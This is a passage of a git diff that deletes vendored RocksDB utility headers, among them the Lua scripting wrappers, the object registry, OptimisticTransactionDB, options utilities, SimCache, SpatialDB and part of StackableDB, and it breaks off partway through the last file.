--- a/thirdparty/rocksdb/include/rocksdb/utilities/lua/rocks_lua_custom_library.h
+++ /dev/null
@@ -1,43 +0,0 @@
-//  Copyright (c) 2016, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-#ifdef LUA
-
-// lua headers
-extern "C" {
-#include <lauxlib.h>
-#include <lua.h>
-#include <lualib.h>
-}
-
-namespace rocksdb {
-namespace lua {
-// A class that used to define custom C Library that is callable
-// from Lua script
-class RocksLuaCustomLibrary {
- public:
-  virtual ~RocksLuaCustomLibrary() {}
-  // The name of the C library.  This name will also be used as the table
-  // (namespace) in Lua that contains the C library.
-  virtual const char* Name() const = 0;
-
-  // Returns a "static const struct luaL_Reg[]", which includes a list of
-  // C functions.  Note that the last entry of this static array must be
-  // {nullptr, nullptr} as required by Lua.
-  //
-  // More details about how to implement Lua C libraries can be found
-  // in the official Lua document http://www.lua.org/pil/26.2.html
-  virtual const struct luaL_Reg* Lib() const = 0;
-
-  // A function that will be called right after the library has been created
-  // and pushed on the top of the lua_State.  This custom setup function
-  // allows developers to put additional table or constant values inside
-  // the same table / namespace.
-  virtual void CustomSetup(lua_State* L) const {}
-};
-}  // namespace lua
-}  // namespace rocksdb
-#endif  // LUA
diff --git a/thirdparty/rocksdb/include/rocksdb/utilities/lua/rocks_lua_util.h b/thirdparty/rocksdb/include/rocksdb/utilities/lua/rocks_lua_util.h
deleted file mode 100644
index 36b007c..0000000
--- a/thirdparty/rocksdb/include/rocksdb/utilities/lua/rocks_lua_util.h
+++ /dev/null
@@ -1,55 +0,0 @@
-//  Copyright (c) 2016, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-// lua headers
-extern "C" {
-#include <lauxlib.h>
-#include <lua.h>
-#include <lualib.h>
-}
-
-#ifdef LUA
-#include <string>
-#include <vector>
-
-#include "rocksdb/utilities/lua/rocks_lua_custom_library.h"
-
-namespace rocksdb {
-namespace lua {
-class LuaStateWrapper {
- public:
-  explicit LuaStateWrapper(const std::string& lua_script) {
-    lua_state_ = luaL_newstate();
-    Init(lua_script, {});
-  }
-  LuaStateWrapper(
-      const std::string& lua_script,
-      const std::vector<std::shared_ptr<RocksLuaCustomLibrary>>& libraries) {
-    lua_state_ = luaL_newstate();
-    Init(lua_script, libraries);
-  }
-  lua_State* GetLuaState() const { return lua_state_; }
-  ~LuaStateWrapper() { lua_close(lua_state_); }
-
- private:
-  void Init(
-      const std::string& lua_script,
-      const std::vector<std::shared_ptr<RocksLuaCustomLibrary>>& libraries) {
-    if (lua_state_) {
-      luaL_openlibs(lua_state_);
-      for (const auto& library : libraries) {
-        luaL_openlib(lua_state_, library->Name(), library->Lib(), 0);
-        library->CustomSetup(lua_state_);
-      }
-      luaL_dostring(lua_state_, lua_script.c_str());
-    }
-  }
-
-  lua_State* lua_state_;
-};
-}  // namespace lua
-}  // namespace rocksdb
-#endif  // LUA
diff --git a/thirdparty/rocksdb/include/rocksdb/utilities/memory_util.h b/thirdparty/rocksdb/include/rocksdb/utilities/memory_util.h
deleted file mode 100644
index c612890..0000000
--- a/thirdparty/rocksdb/include/rocksdb/utilities/memory_util.h
+++ /dev/null
@@ -1,50 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#pragma once
-
-#include <map>
-#include <string>
-#include <unordered_set>
-#include <vector>
-
-#include "rocksdb/cache.h"
-#include "rocksdb/db.h"
-
-namespace rocksdb {
-
-// Returns the current memory usage of the specified DB instances.
-class MemoryUtil {
- public:
-  enum UsageType : int {
-    // Memory usage of all the mem-tables.
-    kMemTableTotal = 0,
-    // Memory usage of those un-flushed mem-tables.
-    kMemTableUnFlushed = 1,
-    // Memory usage of all the table readers.
-    kTableReadersTotal = 2,
-    // Memory usage by Cache.
-    kCacheTotal = 3,
-    kNumUsageTypes = 4
-  };
-
-  // Returns the approximate memory usage of different types in the input
-  // list of DBs and Cache set.  For instance, in the output map
-  // usage_by_type, usage_by_type[kMemTableTotal] will store the memory
-  // usage of all the mem-tables from all the input rocksdb instances.
-  //
-  // Note that for memory usage inside Cache class, we will
-  // only report the usage of the input "cache_set" without
-  // including those Cache usage inside the input list "dbs"
-  // of DBs.
-  static Status GetApproximateMemoryUsageByType(
-      const std::vector<DB*>& dbs,
-      const std::unordered_set<const Cache*> cache_set,
-      std::map<MemoryUtil::UsageType, uint64_t>* usage_by_type);
-};
-}  // namespace rocksdb
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/include/rocksdb/utilities/object_registry.h b/thirdparty/rocksdb/include/rocksdb/utilities/object_registry.h
deleted file mode 100644
index b046ba7..0000000
--- a/thirdparty/rocksdb/include/rocksdb/utilities/object_registry.h
+++ /dev/null
@@ -1,90 +0,0 @@
-// Copyright (c) 2016-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include <functional>
-#include <memory>
-#include <regex>
-#include <string>
-#include <vector>
-
-#include "rocksdb/env.h"
-
-namespace rocksdb {
-
-// Creates a new T using the factory function that was registered with a pattern
-// that matches the provided "target" string according to std::regex_match.
-//
-// If no registered functions match, returns nullptr. If multiple functions
-// match, the factory function used is unspecified.
-//
-// Populates res_guard with result pointer if caller is granted ownership.
-template <typename T>
-T* NewCustomObject(const std::string& target, std::unique_ptr<T>* res_guard);
-
-// Returns a new T when called with a string. Populates the unique_ptr argument
-// if granting ownership to caller.
-template <typename T>
-using FactoryFunc = std::function<T*(const std::string&, std::unique_ptr<T>*)>;
-
-// To register a factory function for a type T, initialize a Registrar<T> object
-// with static storage duration. For example:
-//
-//   static Registrar<Env> hdfs_reg("hdfs://.*", &CreateHdfsEnv);
-//
-// Then, calling NewCustomObject<Env>("hdfs://some_path", ...) will match the
-// regex provided above, so it returns the result of invoking CreateHdfsEnv.
-template <typename T>
-class Registrar {
- public:
-  explicit Registrar(std::string pattern, FactoryFunc<T> factory);
-};
-
-// Implementation details follow.
-
-namespace internal {
-
-template <typename T>
-struct RegistryEntry {
-  std::regex pattern;
-  FactoryFunc<T> factory;
-};
-
-template <typename T>
-struct Registry {
-  static Registry* Get() {
-    static Registry<T> instance;
-    return &instance;
-  }
-  std::vector<RegistryEntry<T>> entries;
-
- private:
-  Registry() = default;
-};
-
-}  // namespace internal
-
-template <typename T>
-T* NewCustomObject(const std::string& target, std::unique_ptr<T>* res_guard) {
-  res_guard->reset();
-  for (const auto& entry : internal::Registry<T>::Get()->entries) {
-    if (std::regex_match(target, entry.pattern)) {
-      return entry.factory(target, res_guard);
-    }
-  }
-  return nullptr;
-}
-
-template <typename T>
-Registrar<T>::Registrar(std::string pattern, FactoryFunc<T> factory) {
-  internal::Registry<T>::Get()->entries.emplace_back(internal::RegistryEntry<T>{
-      std::regex(std::move(pattern)), std::move(factory)});
-}
-
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/include/rocksdb/utilities/optimistic_transaction_db.h b/thirdparty/rocksdb/include/rocksdb/utilities/optimistic_transaction_db.h
deleted file mode 100644
index 02917ff..0000000
--- a/thirdparty/rocksdb/include/rocksdb/utilities/optimistic_transaction_db.h
+++ /dev/null
@@ -1,76 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-#ifndef ROCKSDB_LITE
-
-#include <string>
-#include <vector>
-
-#include "rocksdb/comparator.h"
-#include "rocksdb/db.h"
-
-namespace rocksdb {
-
-class Transaction;
-
-// Database with Transaction support.
-//
-// See optimistic_transaction.h and examples/transaction_example.cc
-
-// Options to use when starting an Optimistic Transaction
-struct OptimisticTransactionOptions {
-  // Setting set_snapshot=true is the same as calling SetSnapshot().
-  bool set_snapshot = false;
-
-  // Should be set if the DB has a non-default comparator.
-  // See comment in WriteBatchWithIndex constructor.
-  const Comparator* cmp = BytewiseComparator();
-};
-
-class OptimisticTransactionDB {
- public:
-  // Open an OptimisticTransactionDB similar to DB::Open().
-  static Status Open(const Options& options, const std::string& dbname,
-                     OptimisticTransactionDB** dbptr);
-
-  static Status Open(const DBOptions& db_options, const std::string& dbname,
-                     const std::vector<ColumnFamilyDescriptor>& column_families,
-                     std::vector<ColumnFamilyHandle*>* handles,
-                     OptimisticTransactionDB** dbptr);
-
-  virtual ~OptimisticTransactionDB() {}
-
-  // Starts a new Transaction.
-  //
-  // Caller is responsible for deleting the returned transaction when no
-  // longer needed.
-  //
-  // If old_txn is not null, BeginTransaction will reuse this Transaction
-  // handle instead of allocating a new one.  This is an optimization to avoid
-  // extra allocations when repeatedly creating transactions.
-  virtual Transaction* BeginTransaction(
-      const WriteOptions& write_options,
-      const OptimisticTransactionOptions& txn_options =
-          OptimisticTransactionOptions(),
-      Transaction* old_txn = nullptr) = 0;
-
-  // Return the underlying Database that was opened
-  virtual DB* GetBaseDB() = 0;
-
- protected:
-  // To Create an OptimisticTransactionDB, call Open()
-  explicit OptimisticTransactionDB(DB* db) {}
-  OptimisticTransactionDB() {}
-
- private:
-  // No copying allowed
-  OptimisticTransactionDB(const OptimisticTransactionDB&);
-  void operator=(const OptimisticTransactionDB&);
-};
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/include/rocksdb/utilities/option_change_migration.h b/thirdparty/rocksdb/include/rocksdb/utilities/option_change_migration.h
deleted file mode 100644
index 81f674c..0000000
--- a/thirdparty/rocksdb/include/rocksdb/utilities/option_change_migration.h
+++ /dev/null
@@ -1,19 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#include <string>
-#include "rocksdb/options.h"
-#include "rocksdb/status.h"
-
-namespace rocksdb {
-// Try to migrate DB created with old_opts to be use new_opts.
-// Multiple column families is not supported.
-// It is best-effort. No guarantee to succeed.
-// A full compaction may be executed.
-Status OptionChangeMigration(std::string dbname, const Options& old_opts,
-                             const Options& new_opts);
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/include/rocksdb/utilities/options_util.h b/thirdparty/rocksdb/include/rocksdb/utilities/options_util.h
deleted file mode 100644
index d02c574..0000000
--- a/thirdparty/rocksdb/include/rocksdb/utilities/options_util.h
+++ /dev/null
@@ -1,93 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-// This file contains utility functions for RocksDB Options.
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include <string>
-#include <vector>
-
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/options.h"
-#include "rocksdb/status.h"
-
-namespace rocksdb {
-// Constructs the DBOptions and ColumnFamilyDescriptors by loading the
-// latest RocksDB options file stored in the specified rocksdb database.
-//
-// Note that the all the pointer options (except table_factory, which will
-// be described in more details below) will be initialized with the default
-// values.  Developers can further initialize them after this function call.
-// Below is an example list of pointer options which will be initialized
-//
-// * env
-// * memtable_factory
-// * compaction_filter_factory
-// * prefix_extractor
-// * comparator
-// * merge_operator
-// * compaction_filter
-//
-// For table_factory, this function further supports deserializing
-// BlockBasedTableFactory and its BlockBasedTableOptions except the
-// pointer options of BlockBasedTableOptions (flush_block_policy_factory,
-// block_cache, and block_cache_compressed), which will be initialized with
-// default values.  Developers can further specify these three options by
-// casting the return value of TableFactoroy::GetOptions() to
-// BlockBasedTableOptions and making necessary changes.
-//
-// ignore_unknown_options can be set to true if you want to ignore options
-// that are from a newer version of the db, esentially for forward
-// compatibility.
-//
-// examples/options_file_example.cc demonstrates how to use this function
-// to open a RocksDB instance.
-//
-// @return the function returns an OK status when it went successfully.  If
-//     the specified "dbpath" does not contain any option file, then a
-//     Status::NotFound will be returned.  A return value other than
-//     Status::OK or Status::NotFound indicates there're some error related
-//     to the options file itself.
-//
-// @see LoadOptionsFromFile
-Status LoadLatestOptions(const std::string& dbpath, Env* env,
-                         DBOptions* db_options,
-                         std::vector<ColumnFamilyDescriptor>* cf_descs,
-                         bool ignore_unknown_options = false);
-
-// Similar to LoadLatestOptions, this function constructs the DBOptions
-// and ColumnFamilyDescriptors based on the specified RocksDB Options file.
-//
-// @see LoadLatestOptions
-Status LoadOptionsFromFile(const std::string& options_file_name, Env* env,
-                           DBOptions* db_options,
-                           std::vector<ColumnFamilyDescriptor>* cf_descs,
-                           bool ignore_unknown_options = false);
-
-// Returns the latest options file name under the specified db path.
-Status GetLatestOptionsFileName(const std::string& dbpath, Env* env,
-                                std::string* options_file_name);
-
-// Returns Status::OK if the input DBOptions and ColumnFamilyDescriptors
-// are compatible with the latest options stored in the specified DB path.
-//
-// If the return status is non-ok, it means the specified RocksDB instance
-// might not be correctly opened with the input set of options.  Currently,
-// changing one of the following options will fail the compatibility check:
-//
-// * comparator
-// * prefix_extractor
-// * table_factory
-// * merge_operator
-Status CheckOptionsCompatibility(
-    const std::string& dbpath, Env* env, const DBOptions& db_options,
-    const std::vector<ColumnFamilyDescriptor>& cf_descs,
-    bool ignore_unknown_options = false);
-
-}  // namespace rocksdb
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/include/rocksdb/utilities/sim_cache.h b/thirdparty/rocksdb/include/rocksdb/utilities/sim_cache.h
deleted file mode 100644
index f29fd5e..0000000
--- a/thirdparty/rocksdb/include/rocksdb/utilities/sim_cache.h
+++ /dev/null
@@ -1,89 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#include <stdint.h>
-#include <memory>
-#include <string>
-#include "rocksdb/cache.h"
-#include "rocksdb/env.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/statistics.h"
-#include "rocksdb/status.h"
-
-namespace rocksdb {
-
-class SimCache;
-
-// For instrumentation purpose, use NewSimCache instead of NewLRUCache API
-// NewSimCache is a wrapper function returning a SimCache instance that can
-// have additional interface provided in Simcache class besides Cache interface
-// to predict block cache hit rate without actually allocating the memory. It
-// can help users tune their current block cache size, and determine how
-// efficient they are using the memory.
-//
-// Since GetSimCapacity() returns the capacity for simulutation, it differs from
-// actual memory usage, which can be estimated as:
-// sim_capacity * entry_size / (entry_size + block_size),
-// where 76 <= entry_size <= 104,
-// BlockBasedTableOptions.block_size = 4096 by default but is configurable,
-// Therefore, generally the actual memory overhead of SimCache is Less than
-// sim_capacity * 2%
-extern std::shared_ptr<SimCache> NewSimCache(std::shared_ptr<Cache> cache,
-                                             size_t sim_capacity,
-                                             int num_shard_bits);
-
-class SimCache : public Cache {
- public:
-  SimCache() {}
-
-  ~SimCache() override {}
-
-  const char* Name() const override { return "SimCache"; }
-
-  // returns the maximum configured capacity of the simcache for simulation
-  virtual size_t GetSimCapacity() const = 0;
-
-  // simcache doesn't provide internal handler reference to user, so always
-  // PinnedUsage = 0 and the behavior will be not exactly consistent the
-  // with real cache.
-  // returns the memory size for the entries residing in the simcache.
-  virtual size_t GetSimUsage() const = 0;
-
-  // sets the maximum configured capacity of the simcache. When the new
-  // capacity is less than the old capacity and the existing usage is
-  // greater than new capacity, the implementation will purge old entries
-  // to fit new capapicty.
-  virtual void SetSimCapacity(size_t capacity) = 0;
-
-  // returns the lookup times of simcache
-  virtual uint64_t get_miss_counter() const = 0;
-  // returns the hit times of simcache
-  virtual uint64_t get_hit_counter() const = 0;
-  // reset the lookup and hit counters
-  virtual void reset_counter() = 0;
-  // String representation of the statistics of the simcache
-  virtual std::string ToString() const = 0;
-
-  // Start storing logs of the cache activity (Add/Lookup) into
-  // a file located at activity_log_file, max_logging_size option can be used to
-  // stop logging to the file automatically after reaching a specific size in
-  // bytes, a values of 0 disable this feature
-  virtual Status StartActivityLogging(const std::string& activity_log_file,
-                                      Env* env, uint64_t max_logging_size = 0) = 0;
-
-  // Stop cache activity logging if any
-  virtual void StopActivityLogging() = 0;
-
-  // Status of cache logging happening in background
-  virtual Status GetActivityLoggingStatus() = 0;
-
- private:
-  SimCache(const SimCache&);
-  SimCache& operator=(const SimCache&);
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/include/rocksdb/utilities/spatial_db.h b/thirdparty/rocksdb/include/rocksdb/utilities/spatial_db.h
deleted file mode 100644
index 477b77c..0000000
--- a/thirdparty/rocksdb/include/rocksdb/utilities/spatial_db.h
+++ /dev/null
@@ -1,261 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-#ifndef ROCKSDB_LITE
-
-#include <string>
-#include <vector>
-
-#include "rocksdb/db.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/utilities/stackable_db.h"
-
-namespace rocksdb {
-namespace spatial {
-
-// NOTE: SpatialDB is experimental and we might change its API without warning.
-// Please talk to us before developing against SpatialDB API.
-//
-// SpatialDB is a support for spatial indexes built on top of RocksDB.
-// When creating a new SpatialDB, clients specifies a list of spatial indexes to
-// build on their data. Each spatial index is defined by the area and
-// granularity. If you're storing map data, different spatial index
-// granularities can be used for different zoom levels.
-//
-// Each element inserted into SpatialDB has:
-// * a bounding box, which determines how will the element be indexed
-// * string blob, which will usually be WKB representation of the polygon
-// (http://en.wikipedia.org/wiki/Well-known_text)
-// * feature set, which is a map of key-value pairs, where value can be null,
-// int, double, bool, string
-// * a list of indexes to insert the element in
-//
-// Each query is executed on a single spatial index. Query guarantees that it
-// will return all elements intersecting the specified bounding box, but it
-// might also return some extra non-intersecting elements.
-
-// Variant is a class that can be many things: null, bool, int, double or string
-// It is used to store different value types in FeatureSet (see below)
-struct Variant {
-  // Don't change the values here, they are persisted on disk
-  enum Type {
-    kNull = 0x0,
-    kBool = 0x1,
-    kInt = 0x2,
-    kDouble = 0x3,
-    kString = 0x4,
-  };
-
-  Variant() : type_(kNull) {}
-  /* implicit */ Variant(bool b) : type_(kBool) { data_.b = b; }
-  /* implicit */ Variant(uint64_t i) : type_(kInt) { data_.i = i; }
-  /* implicit */ Variant(double d) : type_(kDouble) { data_.d = d; }
-  /* implicit */ Variant(const std::string& s) : type_(kString) {
-    new (&data_.s) std::string(s);
-  }
-
-  Variant(const Variant& v) : type_(v.type_) { Init(v, data_); }
-
-  Variant& operator=(const Variant& v);
-
-  Variant(Variant&& rhs) : type_(kNull) { *this = std::move(rhs); }
-
-  Variant& operator=(Variant&& v);
-
-  ~Variant() { Destroy(type_, data_); }
-
-  Type type() const { return type_; }
-  bool get_bool() const { return data_.b; }
-  uint64_t get_int() const { return data_.i; }
-  double get_double() const { return data_.d; }
-  const std::string& get_string() const { return *GetStringPtr(data_); }
-
-  bool operator==(const Variant& other) const;
-  bool operator!=(const Variant& other) const { return !(*this == other); }
-
- private:
-  Type type_;
-
-  union Data {
-    bool b;
-    uint64_t i;
-    double d;
-    // Current version of MS compiler not C++11 compliant so can not put
-    // std::string
-    // however, even then we still need the rest of the maintenance.
-    char s[sizeof(std::string)];
-  } data_;
-
-  // Avoid type_punned aliasing problem
-  static std::string* GetStringPtr(Data& d) {
-    void* p = d.s;
-    return reinterpret_cast<std::string*>(p);
-  }
-
-  static const std::string* GetStringPtr(const Data& d) {
-    const void* p = d.s;
-    return reinterpret_cast<const std::string*>(p);
-  }
-
-  static void Init(const Variant&, Data&);
-
-  static void Destroy(Type t, Data& d) {
-    if (t == kString) {
-      using std::string;
-      GetStringPtr(d)->~string();
-    }
-  }
-};
-
-// FeatureSet is a map of key-value pairs. One feature set is associated with
-// each element in SpatialDB. It can be used to add rich data about the element.
-class FeatureSet {
- private:
-  typedef std::unordered_map<std::string, Variant> map;
-
- public:
-  class iterator {
-   public:
-    /* implicit */ iterator(const map::const_iterator itr) : itr_(itr) {}
-    iterator& operator++() {
-      ++itr_;
-      return *this;
-    }
-    bool operator!=(const iterator& other) { return itr_ != other.itr_; }
-    bool operator==(const iterator& other) { return itr_ == other.itr_; }
-    map::value_type operator*() { return *itr_; }
-
-   private:
-    map::const_iterator itr_;
-  };
-  FeatureSet() = default;
-
-  FeatureSet* Set(const std::string& key, const Variant& value);
-  bool Contains(const std::string& key) const;
-  // REQUIRES: Contains(key)
-  const Variant& Get(const std::string& key) const;
-  iterator Find(const std::string& key) const;
-
-  iterator begin() const { return map_.begin(); }
-  iterator end() const { return map_.end(); }
-
-  void Clear();
-  size_t Size() const { return map_.size(); }
-
-  void Serialize(std::string* output) const;
-  // REQUIRED: empty FeatureSet
-  bool Deserialize(const Slice& input);
-
-  std::string DebugString() const;
-
- private:
-  map map_;
-};
-
-// BoundingBox is a helper structure for defining rectangles representing
-// bounding boxes of spatial elements.
-template <typename T>
-struct BoundingBox {
-  T min_x, min_y, max_x, max_y;
-  BoundingBox() = default;
-  BoundingBox(T _min_x, T _min_y, T _max_x, T _max_y)
-      : min_x(_min_x), min_y(_min_y), max_x(_max_x), max_y(_max_y) {}
-
-  bool Intersects(const BoundingBox<T>& a) const {
-    return !(min_x > a.max_x || min_y > a.max_y || a.min_x > max_x ||
-             a.min_y > max_y);
-  }
-};
-
-struct SpatialDBOptions {
-  uint64_t cache_size = 1 * 1024 * 1024 * 1024LL;  // 1GB
-  int num_threads = 16;
-  bool bulk_load = true;
-};
-
-// Cursor is used to return data from the query to the client. To get all the
-// data from the query, just call Next() while Valid() is true
-class Cursor {
- public:
-  Cursor() = default;
-  virtual ~Cursor() {}
-
-  virtual bool Valid() const = 0;
-  // REQUIRES: Valid()
-  virtual void Next() = 0;
-
-  // Lifetime of the underlying storage until the next call to Next()
-  // REQUIRES: Valid()
-  virtual const Slice blob() = 0;
-  // Lifetime of the underlying storage until the next call to Next()
-  // REQUIRES: Valid()
-  virtual const FeatureSet& feature_set() = 0;
-
-  virtual Status status() const = 0;
-
- private:
-  // No copying allowed
-  Cursor(const Cursor&);
-  void operator=(const Cursor&);
-};
-
-// SpatialIndexOptions defines a spatial index that will be built on the data
-struct SpatialIndexOptions {
-  // Spatial indexes are referenced by names
-  std::string name;
-  // An area that is indexed. If the element is not intersecting with spatial
-  // index's bbox, it will not be inserted into the index
-  BoundingBox<double> bbox;
-  // tile_bits control the granularity of the spatial index. Each dimension of
-  // the bbox will be split into (1 << tile_bits) tiles, so there will be a
-  // total of (1 << tile_bits)^2 tiles. It is recommended to configure a size of
-  // each  tile to be approximately the size of the query on that spatial index
-  uint32_t tile_bits;
-  SpatialIndexOptions() {}
-  SpatialIndexOptions(const std::string& _name,
-                      const BoundingBox<double>& _bbox, uint32_t _tile_bits)
-      : name(_name), bbox(_bbox), tile_bits(_tile_bits) {}
-};
-
-class SpatialDB : public StackableDB {
- public:
-  // Creates the SpatialDB with specified list of indexes.
-  // REQUIRED: db doesn't exist
-  static Status Create(const SpatialDBOptions& options, const std::string& name,
-                       const std::vector<SpatialIndexOptions>& spatial_indexes);
-
-  // Open the existing SpatialDB.  The resulting db object will be returned
-  // through db parameter.
-  // REQUIRED: db was created using SpatialDB::Create
-  static Status Open(const SpatialDBOptions& options, const std::string& name,
-                     SpatialDB** db, bool read_only = false);
-
-  explicit SpatialDB(DB* db) : StackableDB(db) {}
-
-  // Insert the element into the DB. Element will be inserted into specified
-  // spatial_indexes, based on specified bbox.
-  // REQUIRES: spatial_indexes.size() > 0
-  virtual Status Insert(const WriteOptions& write_options,
-                        const BoundingBox<double>& bbox, const Slice& blob,
-                        const FeatureSet& feature_set,
-                        const std::vector<std::string>& spatial_indexes) = 0;
-
-  // Calling Compact() after inserting a bunch of elements should speed up
-  // reading. This is especially useful if you use SpatialDBOptions::bulk_load
-  // Num threads determines how many threads we'll use for compactions. Setting
-  // this to bigger number will use more IO and CPU, but finish faster
-  virtual Status Compact(int num_threads = 1) = 0;
-
-  // Query the specified spatial_index. Query will return all elements that
-  // intersect bbox, but it may also return some extra elements.
-  virtual Cursor* Query(const ReadOptions& read_options,
-                        const BoundingBox<double>& bbox,
-                        const std::string& spatial_index) = 0;
-};
-
-}  // namespace spatial
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/include/rocksdb/utilities/stackable_db.h b/thirdparty/rocksdb/include/rocksdb/utilities/stackable_db.h
deleted file mode 100644
index 991de90..0000000
--- a/thirdparty/rocksdb/include/rocksdb/utilities/stackable_db.h
+++ /dev/null
@@ -1,374 +0,0 @@
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-#include <map>
-#include <string>
-#include "rocksdb/db.h"
-
-#ifdef _WIN32
-// Windows API macro interference
-#undef DeleteFile
-#endif
-
-
-namespace rocksdb {
-
-// This class contains APIs to stack rocksdb wrappers.Eg. Stack TTL over base d
-class StackableDB : public DB {
- public:
-  // StackableDB is the owner of db now!
-  explicit StackableDB(DB* db) : db_(db) {}
-
-  ~StackableDB() {
-    delete db_;
-  }
-
-  virtual DB* GetBaseDB() {
-    return db_;
-  }
-
-  virtual DB* GetRootDB() override { return db_->GetRootDB(); }
-
-  virtual Status CreateColumnFamily(const ColumnFamilyOptions& options,
-                                    const std::string& column_family_name,
-                                    ColumnFamilyHandle** handle) override {
-    return db_->CreateColumnFamily(options, column_family_name, handle);
-  }
-
-  virtual Status CreateColumnFamilies(
-      const ColumnFamilyOptions& options,
-      const std::vector<std::string>& column_family_names,
-      std::vector<ColumnFamilyHandle*>* handles) override {
-    return db_->CreateColumnFamilies(options, column_family_names, handles);
-  }
-
-  virtual Status CreateColumnFamilies(
-      const std::vector<ColumnFamilyDescriptor>& column_families,
-      std::vector<ColumnFamilyHandle*>* handles) override {
-    return db_->CreateColumnFamilies(column_families, handles);
-  }
-
-  virtual Status DropColumnFamily(ColumnFamilyHandle* column_family) override {
-    return db_->DropColumnFamily(column_family);
-  }
-
-  virtual Status DropColumnFamilies(
-      const std::vector<ColumnFamilyHandle*>& column_families) override {
-    return db_->DropColumnFamilies(column_families);
-  }
-
-  virtual Status DestroyColumnFamilyHandle(
-      ColumnFamilyHandle* column_family) override {
-    return db_->DestroyColumnFamilyHandle(column_family);
-  }
-
-  using DB::Put;
-  virtual Status Put(const WriteOptions& options,
-                     ColumnFamilyHandle* column_family, const Slice& key,
-                     const Slice& val) override {
-    return db_->Put(options, column_family, key, val);
-  }
-
-  using DB::Get;
-  virtual Status Get(const ReadOptions& options,
-                     ColumnFamilyHandle* column_family, const Slice& key,
-                     PinnableSlice* value) override {
-    return db_->Get(options, column_family, key, value);
-  }
-
-  using DB::MultiGet;
-  virtual std::vector<Status> MultiGet(
-      const ReadOptions& options,
-      const std::vector<ColumnFamilyHandle*>& column_family,
-      const std::vector<Slice>& keys,
-      std::vector<std::string>* values) override {
-    return db_->MultiGet(options, column_family, keys, values);
-  }
-
-  using DB::IngestExternalFile;
-  virtual Status IngestExternalFile(
-      ColumnFamilyHandle* column_family,
-      const std::vector<std::string>& external_files,
-      const IngestExternalFileOptions& options) override {
-    return db_->IngestExternalFile(column_family, external_files, options);
-  }
-
-  virtual Status VerifyChecksum() override { return db_->VerifyChecksum(); }
-
-  using DB::KeyMayExist;
-  virtual bool KeyMayExist(const ReadOptions& options,
-                           ColumnFamilyHandle* column_family, const Slice& key,
-                           std::string* value,
-                           bool* value_found = nullptr) override {
-    return db_->KeyMayExist(options, column_family, key, value, value_found);
-  }
-
-  using DB::Delete;
-  virtual Status Delete(const WriteOptions& wopts,
-                        ColumnFamilyHandle* column_family,
-                        const Slice& key) override {
-    return db_->Delete(wopts, column_family, key);
-  }
-
-  using DB::SingleDelete;
-  virtual Status SingleDelete(const WriteOptions& wopts,
-                              ColumnFamilyHandle* column_family,
-                              const Slice& key) override {
-    return db_->SingleDelete(wopts, column_family, key);
-  }
-
-  using DB::Merge;
-  virtual Status Merge(const WriteOptions& options,
-                       ColumnFamilyHandle* column_family, const Slice& key,
-                       const Slice& value) override {
-    return db_->Merge(options, column_family, key, value);
-  }
-
-
-  virtual Status Write(const WriteOptions& opts, WriteBatch* updates)
-    override {
-      return db_->Write(opts, updates);
-  }
-
-  using DB::NewIterator;
-  virtual Iterator* NewIterator(const ReadOptions& opts,
-                                ColumnFamilyHandle* column_family) override {
-    return db_->NewIterator(opts, column_family);
-  }
-
-  virtual Status NewIterators(
-      const ReadOptions& options,
-      const std::vector<ColumnFamilyHandle*>& column_families,
-      std::vector<Iterator*>* iterators) override {
-    return db_->NewIterators(options, column_families, iterators);
-  }
-
-
-  virtual const Snapshot* GetSnapshot() override {
-    return db_->GetSnapshot();
-  }
-
-  virtual void ReleaseSnapshot(const Snapshot* snapshot) override {
-    return db_->ReleaseSnapshot(snapshot);
-  }
-
